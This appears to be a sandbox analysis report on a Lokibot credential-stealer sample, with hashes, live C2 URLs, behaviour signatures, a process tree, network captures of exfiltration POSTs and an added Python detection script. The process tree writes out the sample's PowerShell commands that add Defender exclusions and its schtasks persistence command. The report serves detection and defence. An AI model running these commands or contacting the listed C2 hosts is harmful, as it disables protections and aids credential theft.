
Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    29/05/2024, 11:16 UTC

General

  • Target

    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe

  • Size

    557KB

  • MD5

    92bb15f033596b58c278b601da671d65

  • SHA1

    b3e4a2be1c5c616c7e63a3ad9f00b4423bb96dfa

  • SHA256

    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803

  • SHA512

    e470f8965a5a2a406f61ccb34daf0faa4f7f60245568274fde3934b485daa4bff70ea4e4fa98118d4ccf31b3d6be857df115d3a49ad07a1ad4f2d04e981ed2cc

  • SSDEEP

    6144:iaNrMItStH3JMYI4yVnEMn+OUCkCpzZCNmmZHJHxfI7r798qnu90OWF1KBk6GxjI:DNIF2V9dSpHhyE92KB8x+eLhVxBkR

Malware Config

Extracted

Family

lokibot

C2

http://rocheholding.top/evie3/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Only the first URL was contacted during this run (see Network). The other four (kbfvzoboss.bid and the three alphastand.* hosts) turn up in a very large number of Lokibot configurations and are widely regarded as leftovers of the leaked builder rather than live infrastructure; they are still worth blocking, but rocheholding.top is the operator-controlled C2 for this sample.

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell (Add-MpPreference) to modify Windows Defender settings; the cmdlet can add exclusions for file extensions, paths, and processes. In this run the sample adds two path exclusions: its own location under AppData\Local\Temp, and C:\Users\Admin\AppData\Roaming\pczshAYpTd.exe, a name that matches the scheduled task created below. No file at that second path appears in this run's Downloads list, so the persisted copy was not captured here.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs

    Setting another process's thread context after writing into its memory is the classic process-hollowing sequence. Here the first instance (PID 4724, which also shows WriteProcessMemory) launches a second copy of itself (PID 2128); it is that child that accesses the Outlook profiles and whose image region 0x400000-0x4A2000 is dumped, consistent with the unpacked Lokibot payload running inside the hollowed child.
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution. Here the task Updates\pczshAYpTd is created from an XML definition written to C:\Users\Admin\AppData\Local\Temp\tmp786C.tmp (listed under Downloads); the /XML form lets the sample set triggers and actions without exposing them on the command line.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    "C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4724
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2708
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pczshAYpTd.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1892
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pczshAYpTd" /XML "C:\Users\Admin\AppData\Local\Temp\tmp786C.tmp"
      2⤵
      • Creates scheduled task(s)
      PID:2244
    • C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
      "C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe"
      2⤵
      • Accesses Microsoft Outlook profiles
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2128
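To turn the process tree above into a detection, here is an added example (not tria.ge code, and not the sample's) that parses process-creation command lines for the two behaviours this run shows: Defender exclusions added with Add-MpPreference, and a scheduled task created from an XML file. Severity is raised when the parent image runs from a user-writable directory or the excluded path points into one. The event records are constructed from the report's command lines; the record layout (pid, ppid, image, cmdline), the parent PID 1000 and the benign contrast event are assumptions.

```python
"""Triage process-creation events for Defender exclusions (Add-MpPreference)
and schtasks /Create ... /XML persistence.  Added example; not tria.ge code.
Event records are constructed from the report's process tree; the record
layout and the parent PID 1000 are assumed."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Locations a standard user can write to; a parent running from one of these,
# or an exclusion pointing into one, raises the severity.
USER_WRITABLE = re.compile(
    r"\\AppData\\(Local|Roaming)\\|\\Temp\\|\\Downloads\\|\\Public\\", re.I)

# Matches -ExclusionPath "a","b" / -ExclusionProcess x.exe / -ExclusionExtension .tmp
EXCLUSION_RE = re.compile(
    r"-Exclusion(?P<kind>Path|Extension|Process|IpAddress)\s+"
    r"(?P<values>(?:\"[^\"]*\"|'[^']*'|[^\s,]+)(?:\s*,\s*(?:\"[^\"]*\"|'[^']*'|[^\s,]+))*)",
    re.I)
VALUE_RE = re.compile(r"\"([^\"]*)\"|'([^']*)'|([^\s,]+)")
KINDS = {"path": "Path", "extension": "Extension",
         "process": "Process", "ipaddress": "IpAddress"}
TASK_NAME_RE = re.compile(r"/TN\s+(?:\"([^\"]+)\"|(\S+))", re.I)
TASK_XML_RE = re.compile(r"/XML\s+(?:\"([^\"]+)\"|(\S+))", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    rule: str
    severity: str
    detail: str


def defender_exclusions(cmdline: str) -> list[tuple[str, str]]:
    """(kind, value) for each exclusion an Add-/Set-MpPreference command adds."""
    if not re.search(r"\b(Add|Set)-MpPreference\b", cmdline, re.I):
        return []
    found: list[tuple[str, str]] = []
    for m in EXCLUSION_RE.finditer(cmdline):
        kind = KINDS[m.group("kind").lower()]
        for quoted, squoted, bare in VALUE_RE.findall(m.group("values")):
            found.append((kind, quoted or squoted or bare))
    return found


def scheduled_task(cmdline: str) -> dict | None:
    """Task name and XML definition path for a schtasks /Create command."""
    if not re.search(r"\bschtasks(\.exe)?\b.*/create\b", cmdline, re.I):
        return None
    name = TASK_NAME_RE.search(cmdline)
    xml = TASK_XML_RE.search(cmdline)
    return {"name": (name.group(1) or name.group(2)) if name else None,
            "xml": (xml.group(1) or xml.group(2)) if xml else None}


def triage(events: list[ProcEvent]) -> list[Finding]:
    """Walk the events in order and emit one finding per exclusion or task."""
    by_pid = {e.pid: e for e in events}
    findings: list[Finding] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        parent_in_user_dir = bool(parent and USER_WRITABLE.search(parent.image))
        for kind, value in defender_exclusions(e.cmdline):
            high = parent_in_user_dir or bool(USER_WRITABLE.search(value))
            findings.append(Finding(e.pid, "defender_exclusion",
                                    "high" if high else "medium",
                                    f"{kind} exclusion for {value}"))
        task = scheduled_task(e.cmdline)
        if task:
            xml_in_user_dir = bool(task["xml"] and USER_WRITABLE.search(task["xml"]))
            findings.append(Finding(e.pid, "schtasks_create",
                                    "high" if parent_in_user_dir or xml_in_user_dir else "low",
                                    f"task {task['name']} defined by {task['xml']}"))
    return findings


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_CMD = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath '
EVENTS = [  # constructed from the report's process tree; parent PID 1000 assumed
    ProcEvent(4724, 1000, SAMPLE, '"' + SAMPLE + '"'),
    ProcEvent(2708, 4724, PS32, PS_CMD + '"' + SAMPLE + '"'),
    ProcEvent(1892, 4724, PS32, PS_CMD + r'"C:\Users\Admin\AppData\Roaming\pczshAYpTd.exe"'),
    ProcEvent(2244, 4724, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pczshAYpTd" /XML "C:\Users\Admin\AppData\Local\Temp\tmp786C.tmp"'),
    ProcEvent(2128, 4724, SAMPLE, '"' + SAMPLE + '"'),
    # constructed benign contrast: an admin excluding a build directory
    ProcEvent(5000, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe Add-MpPreference -ExclusionPath "D:\Builds"'),
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"[{f.severity:6}] pid={f.pid} {f.rule}: {f.detail}")
```

The same matching applies unchanged to Sysmon Event ID 1 or Windows 4688 command lines. On a live host, the complementary check is to read the current exclusion list back with Get-MpPreference (its ExclusionPath, ExclusionProcess and ExclusionExtension properties) and compare it against the paths a sample like this one adds.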

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    rocheholding.top
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Remote address:
    8.8.8.8:53
    Request
    rocheholding.top
    IN A
    Response
    rocheholding.top
    IN A
    172.67.165.74
    rocheholding.top
    IN A
    104.21.65.180
  • flag-us
    POST
    http://rocheholding.top/evie3/five/fre.php
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Remote address:
    172.67.165.74:80
    Request
    POST /evie3/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: rocheholding.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 21507074
    Content-Length: 358
    Connection: close
    Response
    HTTP/1.1 522
    Date: Wed, 29 May 2024 11:17:22 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BynFwzDbKHLePysMNygi0Hu0zhi6zt3xgofxvKZu01pmclwBplqKuzk%2FXRXOWz3aLxLu7pNFG4eEjOaPC8pd4WAbFgXtxDUcuDqVJaMTC3gkjLXmmcQDrIxpExAg3sWUfdfz"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 88b612eda80952e7-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
  • flag-nl
    GET
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    23.62.61.168:443
    Request
    GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 1107
    date: Wed, 29 May 2024 11:16:39 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.6d3d3e17.1716981399.7bb14f5
  • flag-us
    DNS
    168.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.61.62.23.in-addr.arpa
    IN PTR
    Response
    168.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-168deploystaticakamaitechnologiescom
  • flag-us
    DNS
    168.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.61.62.23.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    168.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.61.62.23.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    168.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.61.62.23.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    168.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.61.62.23.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    74.165.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    74.165.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    74.165.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    74.165.67.172.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
  • flag-us
    POST
    http://rocheholding.top/evie3/five/fre.php
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Remote address:
    172.67.165.74:80
    Request
    POST /evie3/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: rocheholding.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 21507074
    Content-Length: 180
    Connection: close
    Response
    HTTP/1.1 522
    Date: Wed, 29 May 2024 11:18:02 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QWgAi90AF2cE6Lq0gBJTLBYwEQzh%2BACziMpjQGfyMzwgX1DoOgyfD7XXJsSqXwG3ufqHrTU9yfB%2F7oSCXKgJvqlS3eyGzaqWxd%2BWWU4wnv6I3z8%2B9kzN0Q1e6qYxi96bX75h"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 88b613e41f4388c1-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    25.24.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.24.18.2.in-addr.arpa
    IN PTR
    Response
    25.24.18.2.in-addr.arpa
    IN PTR
    a2-18-24-25deploystaticakamaitechnologiescom
  • flag-us
    DNS
    18.24.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.24.18.2.in-addr.arpa
    IN PTR
    Response
    18.24.18.2.in-addr.arpa
    IN PTR
    a2-18-24-18deploystaticakamaitechnologiescom
  • flag-us
    POST
    http://rocheholding.top/evie3/five/fre.php
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Remote address:
    172.67.165.74:80
    Request
    POST /evie3/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: rocheholding.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 21507074
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 522
    Date: Wed, 29 May 2024 11:18:41 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RbQSNfWjmm%2BTD3%2BwQ1PgKanWWJQETm%2BGRvFqb2dTg6m4NpgTMHHNGUcUlJaYbiC17J0OzgDfSSumngIs5i5YjZqZIweo%2BdBwH8Mh53mlep7GpvIm0Rj%2B7s2ZXDOCn%2Bm3%2FNXx"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 88b614d76eb863ea-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 415458
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 69191AE062A64483B479E00A4F874ED5 Ref B: LON04EDGE1215 Ref C: 2024-05-29T11:18:18Z
    date: Wed, 29 May 2024 11:18:17 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 430689
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: AD2A9C1817804AB19A44784451378982 Ref B: LON04EDGE1215 Ref C: 2024-05-29T11:18:18Z
    date: Wed, 29 May 2024 11:18:17 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 638730
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: D94E1C85870C4A30B5663A6B5588AC83 Ref B: LON04EDGE1215 Ref C: 2024-05-29T11:18:18Z
    date: Wed, 29 May 2024 11:18:17 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 555746
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 88358800EA0740558FFB04F52AB653B1 Ref B: LON04EDGE1215 Ref C: 2024-05-29T11:18:18Z
    date: Wed, 29 May 2024 11:18:17 GMT
Connection summary (one entry per connection; byte and packet counts are sent / received). Entries with no process listed are not attributed to the sample by the sandbox; the Bing image fetches and the reverse lookups of Microsoft and Akamai ranges are consistent with Windows background activity rather than sample behaviour.

  • 172.67.165.74:80 (http)
    URL: http://rocheholding.top/evie3/five/fre.php
    Process: a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Bytes: 1.1kB / 998 B; packets: 10 / 6
    HTTP Request: POST http://rocheholding.top/evie3/five/fre.php
    HTTP Response: 522
  • 23.62.61.168:443 (tls, http2)
    URL: https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Bytes: 1.4kB / 6.4kB; packets: 16 / 13
    HTTP Request: GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    HTTP Response: 200
  • 172.67.165.74:80 (http)
    URL: http://rocheholding.top/evie3/five/fre.php
    Process: a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Bytes: 944 B / 964 B; packets: 6 / 5
    HTTP Request: POST http://rocheholding.top/evie3/five/fre.php
    HTTP Response: 522
  • 172.67.165.74:80 (http)
    URL: http://rocheholding.top/evie3/five/fre.php
